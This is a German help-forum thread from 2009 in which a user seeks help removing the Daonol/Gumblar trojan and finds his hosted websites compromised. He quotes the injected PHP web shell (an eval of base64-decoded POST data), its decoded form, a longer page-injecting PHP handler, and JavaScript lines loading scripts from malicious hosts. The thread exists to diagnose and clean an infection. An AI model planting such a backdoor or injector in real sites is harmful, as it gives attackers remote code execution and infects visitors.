Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: TR/Daonol.AA

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Thema geschlossen
Alt 22.11.2009, 11:51   #1
masterli
Gesperrt
 
TR/Daonol.AA - Cool

TR/Daonol.AA



moin,

bin gerade auf euer board gestoßen..

habe mir etwas eingefangen, und bekomm´s net weg

mein sys:
-winxp, sygate, antivir

ich beschreib mal kurz:
-firewall lässt sich nicht starten
-wmp classic funzt auch nicht
-bei jeder 5ten oder 10ten googlesuche schmeißt er mich auf falsche seiten (zumbeispiel auf diese "http://popencoc.com/in.cgi?4&parameter=icq&ur=1&HTTP_REFERER=31201" wenn ich nach ICQ suche)
-icq und andere programme stürzen öfter ab

bisher erfolglos:
-autoruns.exe zeigt mir nix komisches an
-registry auch manuel durchsucht aber keine passenden einträge gefunden
-alle plugins vom browser überprüft
-autostart dateien und ordner(system.ini, etc) überprüft

erfolgreich:
-mit ad-aware habe ich gefährliche Cookies und einen Trojaner gelöscht, der Übeltäter nannte sich "TR/Daonol.AA"

derzeitiger Status:
-ik dachte der wäre weg, aber wenn ich mein browser starte, verhindert ad-aware das meine registry verändert wird, und danach springt antivir an und meldet mir eine Datei im c:\Programme -Ordner.. die danach sofort wieder verschwindet..
-ich nehme mal an, das der wurm sich in meiner registry drin stehen hat, das bei jedem browserstart der wurm sich wieder neu saugt... evtl tarnt er sich auch als ein signiertes plugin, was ich so nicht erkenne...

meine frage.. kennt einer den wurm, was macht er und wo schreibt er sich überall fest

thnx im voraus

Alt 22.11.2009, 16:10   #2
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



Zitat:
Malwarebytes' Anti-Malware 1.41
Datenbank Version: 3213
Windows 5.1.2600 Service Pack 2

22.11.2009 17:20:37
mbam-log-2009-11-22 (17-20-37).txt

Scan-Methode: Vollständiger Scan (C:\|)
Durchsuchte Objekte: 232796
Laufzeit: 27 minute(s), 24 second(s)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden)
wie gesagt, keiner findet was, allerdings taucht das teil immer wieder auf...

das ding nimmt anscheinend größere ausmaße... mein ganzer webserver is befallen

in jeder html und php-file sind neue code-zeilen
Code:
ATTFilter
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'
         
darüber hab ich mir das teil warscheinlich eingefangen...

Zitat:
190.54.62.68 - - [22/Nov/2009:12:15:26 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:28 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:29 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:30 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:32 +0100] "POST /images/gifimg.php HTTP/1.0" 200 320 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:33 +0100] "POST /images/kyg/logo.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:34 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:35 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:36 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:38 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
der sack hat sich anscheinend reingehackt und sein wurm verbreitet
oder läuft bei meinem provider der wurm auf den servern?

evtl bin ik ja jetz schon sauber, und hol mir das immer wieder durch mein webserver rein...
__________________


Alt 23.11.2009, 11:41   #3
masterli
Gesperrt
 
TR/Daonol.AA - Böse

TR/Daonol.AA



hallo, kennt einer den wurm?

was schreibt der in die registry?

wurde der wurm vom hacker auf meinem webserver platziert?

keiner n plan, oder will mir keiner helfen?

gebt ma feedback, dann lösch ik mich hier wieder
__________________

Alt 23.11.2009, 11:57   #4
undoreal
/// AVZ-Toolkit Guru
 
TR/Daonol.AA - Standard

TR/Daonol.AA



Hallöle.

Das du gereizt bist kann man verstehen. Wir machen uns die Arbeit hier aber ehrenamtlich und haben daher wenig Lust auf dumme Anmachen.
Zügel deine schlechte Laune daher bitte ein wenig.

Den Webserver solltest du natürlich vom Netz nehmen und neuaufsetzen.

Poste bitte zwei AVZ logs wie in der Anleitung beschrieben.
__________________
- Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben -

Alt 23.11.2009, 12:25   #5
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



war ja kene anmache und bin ja och nich gereizt, wollt nur ne info, warum allen nur mir nich geantwortet wird ejal/wayne

mein webserver ist leider nur n gemieteter, bzw ich hab da nur n paar ordner... den betreiber hab ik schon informiert, aber auch noch keine rückmeldung erhalten..
neuaufsetzen is nich jut, da meine backups nich aktuell sind, mir bleibt wohl nix anderes übrig und alle dateien/scripte runterzuladen und mitn andern script nach den eintragungen suchen und rausnehmen lassen...

dad mit AVZ werd ik glei ma machen


Alt 23.11.2009, 12:51   #6
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



hier sind die logs, ik hab schonma als dank zweima auf die googlewerbung geklickt

Alt 23.11.2009, 20:49   #7
undoreal
/// AVZ-Toolkit Guru
 
TR/Daonol.AA - Standard

TR/Daonol.AA



Führe bitte folgendes Skript aus:

Code:
ATTFilter
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 DeleteFile('C:\PROGRA~1\INTERN~1\..\lohe.old 0yAAAAAAAA');
 DelBHO('AutorunsDisabled');
 DelBHO('710EB7A1-45ED-11D0-924A-0020AFC7AC4D');
 QuarantineFile('C:\WINDOWS\system32\x264vfw.dll');
 QuarantineFile('C:\WINDOWS\Installer\{90170407-6000-11D3-8CFE-0150048383C9}\misc.exe');
 QuarantineFile('spse.sys');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Drivers32','midi9');
BC_ImportALL;
ExecuteSysClean;
ExecuteWizard('TSW', 3, 3, true); 
BC_Activate;
RebootWindows(true);
end.
         
Nach dem Neustarte führ bitte folgendes Skript aus:

Code:
ATTFilter
begin
CreateQurantineArchive('C:\quarantine.zip');
end.
         
Die C:\quarantine.zip lade bitte bei file-upload.net hoch und poste uns den downloadlink.
__________________
- Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben -

Alt 23.11.2009, 20:55   #8
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



"windows Scripting Host" ist bei mir deaktiviert/deinstalliert, gibts eine andere möglichkeit?

vom webspace-anbieter hab ich die info bekommen, das nur ich betroffen bin. ich soll/werde n backup ziehen, bereinigen und neu aufspielen.. is nur übel bei ca 15 subdomains und lauter unterwebs(blogs,foren,etc)... es sind wirklich alle html,php und js-files betroffen..

das komische, es hat sich bisher keiner weiter eingelogt, und es sind bereits gesäuberte dateien wieder verseucht...

Zitat:
aus meinem Forum:


habe in php-seiten das stehen:

<? php eval base64_decode(xxxxx)

und in html-seiten steht immer n script von irgendwelchen webseiten....

und in jeden image-ordner eine:

gifimg.php

in der steht zbsp auch
Code:
ATTFilter
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
         
is ne 64bit-verschl., übersetzt(encoded) kommt das raus
Code:
ATTFilter
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
         
die config hat das drin:
Code:
ATTFilter
aWYoIWZ1bmN0aW9uX2V4aXN0cygnaHdjbjInKSl7ZnVuY3Rpb24gaHdjbjIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMnR1Wldsd2NDMWxiV1JsYmk1a1pTOXRiMjVoZEM5cmFYUmhMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gaHdjbjIyKCRhLCRiLCRjLCRkKXtnbG9iYWwkaHdjbjIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRod2NuMjEpKWNhbGxfdXNlcl9mdW5jKCRod2NuMjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2h3Y24yJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnaHdjbjInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kaHdjbjJsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdod2NuMjInKSkhPSdod2NuMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw
         
und übersetzt:
Code:
ATTFilter
if(!function_exists('hwcn2')){function hwcn2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2tuZWlwcC1lbWRlbi5kZS9tb25hdC9raXRhLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function hwcn22($a,$b,$c,$d){global$hwcn21;$s=array();if(function_exists($hwcn21))call_user_func($hwcn21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='hwcn2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('hwcn2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$hwcn2l=(($a=@set_error_handler('hwcn22'))!='hwcn22')?$a:0;eval(base64_decode($_POST['e']));
         
außerdem steht in jeder js-file:
Code:
ATTFilter
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://m1design.ho.ua/images/gifimg.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
         
dazu hab ich das gefunden
http://www.samuidevelopment.com/2009...itet-sich-aus/

hier nochma die google-meldung, scheinen mehr seiten zu betreffen
http://www.google.com/safebrowsing/d...reme.de/&hl=de

Geändert von masterli (23.11.2009 um 21:03 Uhr)

Alt 23.11.2009, 21:23   #9
undoreal
/// AVZ-Toolkit Guru
 
TR/Daonol.AA - Standard

TR/Daonol.AA



Du sollst das Skript mit AVZ ausführen. Oder geht das ohne den Skript Host nicht. Wenn nicht dann musst du ihn wieder aktivieren. Warum ist der deaktiviert??
__________________
- Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben -

Alt 23.11.2009, 21:29   #10
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



deaktiviert, damit keine scripte nebenbei bei mir ausgeführt werden können, da ich dies nicht benötige und einige störenfriede so nicht aktiv werden können.. ach mit avz, jo das mach ich gleich mal ^^

Alt 23.11.2009, 21:53   #11
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



die 111111.com lässt sich nicht mehr starten, beim öffnen passiert nix, nichtmal ein task wird angezeigt, ich mach feierabend für heute.. bis morgen

€dit:achso,ich kanns mir auch nicht neu saugen ->http501/505

Alt 24.11.2009, 15:30   #12
undoreal
/// AVZ-Toolkit Guru
 
TR/Daonol.AA - Standard

TR/Daonol.AA



Und, heute besser mit AVZ?
__________________
- Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben -

Alt 24.11.2009, 18:03   #13
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



es lässt sich nicht mehr starten... ich versuchs nochma neu zu saugen...

das teil was ich mir und meinem server eingefangen hab nennt sich wohl "Gumblar"


€dit: bekomme immer 501/505 error, kanns net mehr saugen und nicht starten...

Geändert von masterli (24.11.2009 um 18:13 Uhr)

Alt 24.11.2009, 21:02   #14
masterli
Gesperrt
 
TR/Daonol.AA - Standard

TR/Daonol.AA



AVZ lässt sich nicht mehr starten oder downloaden, und "Malwarebytes' Anti-Malware" schließt sich nach 1sek automatisch... ad-aware und antivir laufen aber ohne probleme....

ich hab mein server bereinigt, wenn ich den hier noch drauf hab, war das alles um sonst, wa?

Alt 24.11.2009, 23:33   #15
masterli
Gesperrt
 
TR/Daonol.AA - Unglücklich

TR/Daonol.AA



sry für die doppelposts, aber ich kann nicht mehr den beitrag editieren...

ich wollte gerade mcafee saugen, komme aber nichtmal auf die homepage...

ich habe mal ne txt-datei von "autoruns" mit angehangen, evtl findet ihr ja was, was ich im abgesicherten rauskannten kann..

ich will mein sys nicht neu machen
Angehängte Dateien
Dateityp: txt AutoRuns.txt (7,1 KB, 445x aufgerufen)

Thema geschlossen

Themen zu TR/Daonol.AA
ad-aware, board, browser, dateien, eingefangen, einträge, falsche, falsche seite, falsche seiten, funzt, gefährliche, gelöscht, gen, manuel, neu, ordner, plugins, programme, seite, seiten, sygate, tr/daonol.aa, trojaner, verhindert, verändert, wurm



Ähnliche Themen: TR/Daonol.AA


  1. System von Trojaner Daonol.hbe befallen
    Log-Analyse und Auswertung - 12.02.2010 (1)
  2. PSW.Win32.Kates / w32.Daonol entfernen
    Anleitungen, FAQs & Links - 09.02.2010 (2)
  3. Trojan:W32/Daonol.gen!J und Trojan.Generic1689510
    Log-Analyse und Auswertung - 05.01.2010 (2)
  4. TR/Daonol.hbe Meldung kommt nach dem booten
    Plagegeister aller Art und deren Bekämpfung - 07.06.2009 (0)
  5. Trojanisches Pferd TR/Daonol.A.3
    Log-Analyse und Auswertung - 24.02.2009 (8)
  6. Trojaner Problem: TR/Daonol.B.6
    Log-Analyse und Auswertung - 14.01.2009 (3)

Zum Thema TR/Daonol.AA - moin, bin gerade auf euer board gestoßen.. habe mir etwas eingefangen, und bekomm´s net weg mein sys: -winxp, sygate, antivir ich beschreib mal kurz: -firewall lässt sich nicht starten -wmp - TR/Daonol.AA...
Archiv
Du betrachtest: TR/Daonol.AA auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.